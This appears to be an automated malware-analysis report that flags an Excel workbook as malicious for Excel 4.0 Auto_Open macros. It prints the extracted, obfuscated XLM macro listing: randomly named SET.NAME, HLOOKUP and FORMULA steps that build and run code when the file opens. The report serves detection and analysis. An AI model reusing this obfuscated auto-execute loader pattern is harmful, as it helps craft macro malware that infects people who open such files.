MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6458 bytes |
SHA-256: 23352f36a42d8cce8faf63b9449a16d45b292bba95d6700383a1a428995a7600 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - ptRF
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!I159
' 0018 23 LABEL : Cell Value, String Constant - CtnKiHBk len=0
' 0018 23 LABEL : Cell Value, String Constant - cxGbyyeg len=0
' 0018 20 LABEL : Cell Value, String Constant - eIczB len=0
' 0018 21 LABEL : Cell Value, String Constant - GetKUz len=0
' 0018 20 LABEL : Cell Value, String Constant - iyVyR len=0
' 0018 25 LABEL : Cell Value, String Constant - mrCAOeNLYk len=0
' 0018 27 LABEL : Cell Value, String Constant - ncJebQoWhuqt len=0
' 0018 23 LABEL : Cell Value, String Constant - OPyUuTSN len=0
' 0018 27 LABEL : Cell Value, String Constant - qCutIHJjFyKr len=0
' 0018 20 LABEL : Cell Value, String Constant - qWpuI len=0
' 0018 20 LABEL : Cell Value, String Constant - QzXbJ len=0
' 0018 22 LABEL : Cell Value, String Constant - rQigUws len=0
' 0018 20 LABEL : Cell Value, String Constant - sYXgX len=0
' 0018 23 LABEL : Cell Value, String Constant - tLTgZbXu len=0
' 0018 25 LABEL : Cell Value, String Constant - uqfZPBhjSZ len=0
' 0018 22 LABEL : Cell Value, String Constant - VOTZhzL len=0
' 0018 25 LABEL : Cell Value, String Constant - vZOQzHaUYw len=0
' 0018 21 LABEL : Cell Value, String Constant - wFlYrm len=0
' 0018 21 LABEL : Cell Value, String Constant - xQprTQ len=0
' 0018 20 LABEL : Cell Value, String Constant - yrHeE len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' ptRF,I65,"SET.NAME("cxGbyyeg",VALUE("0"))",""
' ptRF,I70,"SET.NAME("iyVyR",cxGbyyeg)",""
' ptRF,I74,"SET.NAME("VOTZhzL",cxGbyyeg)",""
' ptRF,I79,"SET.NAME("rQigUws",COUNTA(sYXgX))",""
' ptRF,I82,"SET.NAME("tLTgZbXu",COUNTA(qWpuI))",""
' ptRF,I86,[],""
' ptRF,I88,"SET.NAME("vZOQzHaUYw","")",""
' ptRF,I92,"iyVyR",""
' ptRF,I94,"SET.NAME("wFlYrm",HLOOKUP("*",sYXgX,iyVyR,FALSE))",""
' ptRF,I99,"mrCAOeNLYk",""
' ptRF,I102,"SET.NAME("qCutIHJjFyKr",cxGbyyeg)",""
' ptRF,I104,[],""
' ptRF,I108,"qCutIHJjFyKr",""
' ptRF,I111,"eIczB",""
' ptRF,I115,"OPyUuTSN",""
' ptRF,I117,"CtnKiHBk",""
' ptRF,I121,"SET.NAME("QzXbJ",VALUE(HLOOKUP("*",qWpuI,CtnKiHBk,FALSE)))",""
' ptRF,I126,"yrHeE",""
' ptRF,I128,"vZOQzHaUYw",""
' ptRF,I132,"VOTZhzL",""
' ptRF,I136,NEXT(),""
' ptRF,I140,"xQprTQ",""
' ptRF,I143,"SET.NAME("f",INT(T(FORMULA(T(vZOQzHaUYw)&"",""&T(xQprTQ)))))",""
' ptRF,I147,"ncJebQoWhuqt",""
' ptRF,I149,NEXT(),""
' ptRF,I154,RETURN(),""
' ptRF,I187,"SET.NAME("GetKUz",I65)",""
' ptRF,I191,"sYXgX",""
' ptRF,I194,"SET.NAME("qWpuI",R40C13)",""
' ptRF,I199,"SET.NAME("ncJebQoWhuqt",207)",""
' ptRF,I202,"SET.NAME("uqfZPBhjSZ",9)",""
' ptRF,I206,GetKUz(),""
' ptRF,I207,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.